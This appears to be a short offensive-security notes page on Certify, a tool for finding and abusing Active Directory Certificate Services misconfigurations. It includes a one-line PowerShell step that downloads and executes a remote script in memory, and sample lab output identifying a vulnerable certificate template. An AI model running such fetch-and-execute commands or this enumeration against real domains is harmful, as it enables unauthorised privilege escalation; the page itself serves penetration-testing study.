Certify

Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).

@harmj0y and @tifkin_ are the primary authors of Certify and the the associated AD CS research (blog and whitepaper).

Installation

Please compile the .exe yourself or use the PowerShell script below. The examples will use the PowerShell implementation.

iex((iwr https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Certify.ps1).content)

Examples

Identify vulnerable PKIs

PS Z:\> Invoke-Certify -Command 'find /vulnerable'

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=offsec,DC.nl'

[*] Listing info about the Enterprise CA 'offsec-DC01PKI-CA'

    Enterprise CA Name            : offsec-DC01PKI-CA
    DNS Hostname                  : DC01PKI.offsec.nl
    FullName                      : DC01PKI.offsec.nl\offsec-DC01PKI-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=offsec-DC01PKI-CA, DC=offsec, DC.nl
    Cert Thumbprint               : 2CFF52459C3F6C9BD541FDDAF3CC6F0EA72671CC
    Cert Serial                   : 1C0000000565446F3BBD81156A000000000005
    Cert Start Date               : 12/20/2021 6:34:12 AM
    Cert End Date                 : 12/20/2026 6:44:12 AM
    Cert Chain                    : CN=DC01PKI-N1-CA -> CN=offsec-DC01PKI-CA,DC=offsec,DC.nl
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated Users S-1-5-11
      Allow  Read, Enroll                               NT AUTHORITY\NETWORK SERVICE  S-1-5-20
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               offsec\Domain Admins      S-1-5-21-497837788-612300594-3587273769-512
      Allow  ManageCA, ManageCertificates               offsec\Enterprise Admins  S-1-5-21-497837788-612300594-3587273769-519
    Enrollment Agent Restrictions : None

[!] Vulnerable certificate templates that exist but an Enterprise CA does not publish:

    ConfigMgrWebServerCertificate


[!] Vulnerable Certificates Templates :

    CA Name                         : DC01PKI.offsec.nl\offsec-DC01PKI-CA
    Template Name                   : UsersOffsecAD
    Schema Version                  : 2
    Validity Period                 : 1 year
    Renewal Period                  : 6 weeks
    msPKI-Certificates-Name-Flag    : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag           : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required  : 0
    pkiextendedkeyusage             : Client Authentication
    Permissions
      Enrollment Permissions
        Enrollment Rights           : offsec\Domain Admins      S-1-5-21-497837788-612300594-3587273769-512
                                      offsec\Domain Users       S-1-5-21-497837788-612300594-3587273769-513
                                      offsec\Enterprise Admins  S-1-5-21-497837788-612300594-3587273769-519
      Object Control Permissions
        Owner                       : offsec\Administrator      S-1-5-21-497837788-612300594-3587273769-500
        WriteOwner Principals       : offsec\Administrator      S-1-5-21-497837788-612300594-3587273769-500
                                      offsec\Domain Admins      S-1-5-21-497837788-612300594-3587273769-512
                                      offsec\Enterprise Admins  S-1-5-21-497837788-612300594-3587273769-519
        WriteDacl Principals        : offsec\Administrator      S-1-5-21-497837788-612300594-3587273769-500
                                      offsec\Domain Admins      S-1-5-21-497837788-612300594-3587273769-512
                                      offsec\Enterprise Admins  S-1-5-21-497837788-612300594-3587273769-519
        WriteProperty Principals    : offsec\Administrator      S-1-5-21-497837788-612300594-3587273769-500
                                      offsec\Domain Admins      S-1-5-21-497837788-612300594-3587273769-512
                                      offsec\Enterprise Admins  S-1-5-21-497837788-612300594-3587273769-519

C3rt1fy completed in 00:00:01.1902168

URL list